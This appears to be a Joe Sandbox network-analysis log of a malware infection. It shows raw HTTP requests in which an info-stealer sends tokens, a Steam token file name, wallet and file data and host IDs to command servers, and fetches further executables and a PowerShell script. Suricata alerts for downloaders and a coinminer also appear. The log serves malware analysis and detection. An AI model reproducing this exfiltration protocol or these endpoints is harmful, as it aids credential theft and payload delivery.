Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GIECFIEGDBKJKFIDHIECHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 49 45 43 46 49 45 47 44 42 4b 4a 4b 46 49 44 48 49 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 62 33 38 35 35 39 63 33 35 36 63 66 30 32 32 39 33 65 61 61 62 34 30 38 66 35 30 31 36 63 35 32 62 32 30 36 33 35 63 38 35 66 39 32 66 32 64 35 63 33 30 37 33 37 66 62 62 37 36 62 65 32 32 33 66 65 63 37 38 36 65 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 43 46 49 45 47 44 42 4b 4a 4b 46 49 44 48 49 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 43 46 49 45 47 44 42 4b 4a 4b 46 49 44 48 49 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 43 46 49 45 47 44 42 4b 4a 4b 46 49 44 48 49 45 43 2d 2d 0d 0a Data Ascii: ------GIECFIEGDBKJKFIDHIECContent-Disposition: form-data; name="token"cb38559c356cf02293eaab408f5016c52b20635c85f92f2d5c30737fbb76be223fec786e------GIECFIEGDBKJKFIDHIECContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------GIECFIEGDBKJKFIDHIECContent-Disposition: form-data; name="file"------GIECFIEGDBKJKFIDHIEC--
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/freebl3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/mozglue.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/msvcp140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/nss3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/softokn3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/vcruntime140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CAKKJKKECFIDGDHIJEGDHost: 185.215.113.206Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CAKKJKKECFIDGDHIJEGDHost: 185.215.113.206Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 41 4b 4b 4a 4b 4b 45 43 46 49 44 47 44 48 49 4a 45 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 62 33 38 35 35 39 63 33 35 36 63 66 30 32 32 39 33 65 61 61 62 34 30 38 66 35 30 31 36 63 35 32 62 32 30 36 33 35 63 38 35 66 39 32 66 32 64 35 63 33 30 37 33 37 66 62 62 37 36 62 65 32 32 33 66 65 63 37 38 36 65 0d 0a 2d 2d 2d 2d 2d 2d 43 41 4b 4b 4a 4b 4b 45 43 46 49 44 47 44 48 49 4a 45 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 43 41 4b 4b 4a 4b 4b 45 43 46 49 44 47 44 48 49 4a 45 47 44 2d 2d 0d 0a Data Ascii: ------CAKKJKKECFIDGDHIJEGDContent-Disposition: form-data; name="token"cb38559c356cf02293eaab408f5016c52b20635c85f92f2d5c30737fbb76be223fec786e------CAKKJKKECFIDGDHIJEGDContent-Disposition: form-data; name="message"wallets------CAKKJKKECFIDGDHIJEGD--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FHJDAAEGIDHDGCAAFCBAHost: 185.215.113.206Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 48 4a 44 41 41 45 47 49 44 48 44 47 43 41 41 46 43 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 62 33 38 35 35 39 63 33 35 36 63 66 30 32 32 39 33 65 61 61 62 34 30 38 66 35 30 31 36 63 35 32 62 32 30 36 33 35 63 38 35 66 39 32 66 32 64 35 63 33 30 37 33 37 66 62 62 37 36 62 65 32 32 33 66 65 63 37 38 36 65 0d 0a 2d 2d 2d 2d 2d 2d 46 48 4a 44 41 41 45 47 49 44 48 44 47 43 41 41 46 43 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 46 48 4a 44 41 41 45 47 49 44 48 44 47 43 41 41 46 43 42 41 2d 2d 0d 0a Data Ascii: ------FHJDAAEGIDHDGCAAFCBAContent-Disposition: form-data; name="token"cb38559c356cf02293eaab408f5016c52b20635c85f92f2d5c30737fbb76be223fec786e------FHJDAAEGIDHDGCAAFCBAContent-Disposition: form-data; name="message"files------FHJDAAEGIDHDGCAAFCBA--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AAAKEBGDAFHIIDHIIECFHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 41 41 4b 45 42 47 44 41 46 48 49 49 44 48 49 49 45 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 62 33 38 35 35 39 63 33 35 36 63 66 30 32 32 39 33 65 61 61 62 34 30 38 66 35 30 31 36 63 35 32 62 32 30 36 33 35 63 38 35 66 39 32 66 32 64 35 63 33 30 37 33 37 66 62 62 37 36 62 65 32 32 33 66 65 63 37 38 36 65 0d 0a 2d 2d 2d 2d 2d 2d 41 41 41 4b 45 42 47 44 41 46 48 49 49 44 48 49 49 45 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 41 41 41 4b 45 42 47 44 41 46 48 49 49 44 48 49 49 45 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 41 41 41 4b 45 42 47 44 41 46 48 49 49 44 48 49 49 45 43 46 2d 2d 0d 0a Data Ascii: ------AAAKEBGDAFHIIDHIIECFContent-Disposition: form-data; name="token"cb38559c356cf02293eaab408f5016c52b20635c85f92f2d5c30737fbb76be223fec786e------AAAKEBGDAFHIIDHIIECFContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------AAAKEBGDAFHIIDHIIECFContent-Disposition: form-data; name="file"------AAAKEBGDAFHIIDHIIECF--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BAFIEGIECGCBKFIEBGCAHost: 185.215.113.206Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 41 46 49 45 47 49 45 43 47 43 42 4b 46 49 45 42 47 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 62 33 38 35 35 39 63 33 35 36 63 66 30 32 32 39 33 65 61 61 62 34 30 38 66 35 30 31 36 63 35 32 62 32 30 36 33 35 63 38 35 66 39 32 66 32 64 35 63 33 30 37 33 37 66 62 62 37 36 62 65 32 32 33 66 65 63 37 38 36 65 0d 0a 2d 2d 2d 2d 2d 2d 42 41 46 49 45 47 49 45 43 47 43 42 4b 46 49 45 42 47 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 42 41 46 49 45 47 49 45 43 47 43 42 4b 46 49 45 42 47 43 41 2d 2d 0d 0a Data Ascii: ------BAFIEGIECGCBKFIEBGCAContent-Disposition: form-data; name="token"cb38559c356cf02293eaab408f5016c52b20635c85f92f2d5c30737fbb76be223fec786e------BAFIEGIECGCBKFIEBGCAContent-Disposition: form-data; name="message"ybncbhylepme------BAFIEGIECGCBKFIEBGCA--
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GCFIIEBKEGHJJJJJJDAAHost: 185.215.113.206Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 43 46 49 49 45 42 4b 45 47 48 4a 4a 4a 4a 4a 4a 44 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 62 33 38 35 35 39 63 33 35 36 63 66 30 32 32 39 33 65 61 61 62 34 30 38 66 35 30 31 36 63 35 32 62 32 30 36 33 35 63 38 35 66 39 32 66 32 64 35 63 33 30 37 33 37 66 62 62 37 36 62 65 32 32 33 66 65 63 37 38 36 65 0d 0a 2d 2d 2d 2d 2d 2d 47 43 46 49 49 45 42 4b 45 47 48 4a 4a 4a 4a 4a 4a 44 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 47 43 46 49 49 45 42 4b 45 47 48 4a 4a 4a 4a 4a 4a 44 41 41 2d 2d 0d 0a Data Ascii: ------GCFIIEBKEGHJJJJJJDAAContent-Disposition: form-data; name="token"cb38559c356cf02293eaab408f5016c52b20635c85f92f2d5c30737fbb76be223fec786e------GCFIIEBKEGHJJJJJJDAAContent-Disposition: form-data; name="message"wkkjqaiaxkhb------GCFIIEBKEGHJJJJJJDAA--
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 33 32 39 37 34 42 30 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7BB32974B05E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: GET /files/7658082748/wTMEVe8.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 33 32 33 38 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1013238001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/6554834407/ntRoEwh.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 33 32 33 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1013239001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/5131681669/KeaEfrP.ps1 HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 33 32 34 38 30 34 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1013248041&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 33 32 34 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1013249001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 33 32 35 30 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1013250001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 33 32 35 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1013251001&unit=246122658369
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IECFHDBAAECAAKFHDHIIHost: 185.215.113.206Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 45 43 46 48 44 42 41 41 45 43 41 41 4b 46 48 44 48 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 32 36 36 42 33 32 30 39 44 30 46 38 30 37 36 35 36 36 31 35 0d 0a 2d 2d 2d 2d 2d 2d 49 45 43 46 48 44 42 41 41 45 43 41 41 4b 46 48 44 48 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 74 6f 6b 0d 0a 2d 2d 2d 2d 2d 2d 49 45 43 46 48 44 42 41 41 45 43 41 41 4b 46 48 44 48 49 49 2d 2d 0d 0a Data Ascii: ------IECFHDBAAECAAKFHDHIIContent-Disposition: form-data; name="hwid"3266B3209D0F807656615------IECFHDBAAECAAKFHDHIIContent-Disposition: form-data; name="build"stok------IECFHDBAAECAAKFHDHII--
Source: global traffic	HTTP traffic detected: GET /off/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CAAAAFBKFIECAAKECGCAHost: 185.215.113.206Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 41 41 41 41 46 42 4b 46 49 45 43 41 41 4b 45 43 47 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 32 36 36 42 33 32 30 39 44 30 46 38 30 37 36 35 36 36 31 35 0d 0a 2d 2d 2d 2d 2d 2d 43 41 41 41 41 46 42 4b 46 49 45 43 41 41 4b 45 43 47 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 74 6f 6b 0d 0a 2d 2d 2d 2d 2d 2d 43 41 41 41 41 46 42 4b 46 49 45 43 41 41 4b 45 43 47 43 41 2d 2d 0d 0a Data Ascii: ------CAAAAFBKFIECAAKECGCAContent-Disposition: form-data; name="hwid"3266B3209D0F807656615------CAAAAFBKFIECAAKECGCAContent-Disposition: form-data; name="build"stok------CAAAAFBKFIECAAKECGCA--
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJJJEBGDAFHJEBGDGIJDHost: 185.215.113.206Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4a 4a 4a 45 42 47 44 41 46 48 4a 45 42 47 44 47 49 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 32 36 36 42 33 32 30 39 44 30 46 38 30 37 36 35 36 36 31 35 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4a 4a 45 42 47 44 41 46 48 4a 45 42 47 44 47 49 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 74 6f 6b 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4a 4a 45 42 47 44 41 46 48 4a 45 42 47 44 47 49 4a 44 2d 2d 0d 0a Data Ascii: ------JJJJEBGDAFHJEBGDGIJDContent-Disposition: form-data; name="hwid"3266B3209D0F807656615------JJJJEBGDAFHJEBGDGIJDContent-Disposition: form-data; name="build"stok------JJJJEBGDAFHJEBGDGIJD--

Source: Joe Sandbox View	IP Address: 185.215.113.43 185.215.113.43
Source: Joe Sandbox View	IP Address: 185.215.113.16 185.215.113.16

Source: Joe Sandbox View	ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Source: Joe Sandbox View	ASN Name: SELECTEL-MSKRU SELECTEL-MSKRU
Source: Joe Sandbox View	ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL

Source: Joe Sandbox View	JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View	JA3 fingerprint: fb0aa01abe9d8e4037eb3473ca6e2dca

Source: Network traffic	Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49730 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49748 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49757 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49778 -> 31.41.244.11:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49805 -> 31.41.244.11:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49828 -> 31.41.244.11:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49842 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49862 -> 104.21.16.9:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49871 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49870 -> 104.21.16.9:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49880 -> 104.21.16.9:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49893 -> 104.21.16.9:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49894 -> 154.216.20.243:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49895 -> 154.216.20.243:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49904 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49906 -> 104.21.16.9:443
Source: Network traffic	Suricata IDS: 2036289 - Severity 2 - ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro) : 192.168.2.4:53460 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49920 -> 154.216.20.243:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49932 -> 104.21.16.9:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49933 -> 154.216.20.243:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49936 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49929 -> 104.21.16.9:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49944 -> 154.216.20.243:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49946 -> 104.21.16.9:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49948 -> 104.21.16.9:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49954 -> 154.216.20.243:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49989 -> 104.21.16.9:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50045 -> 104.21.16.9:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50061 -> 104.21.16.9:443

Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
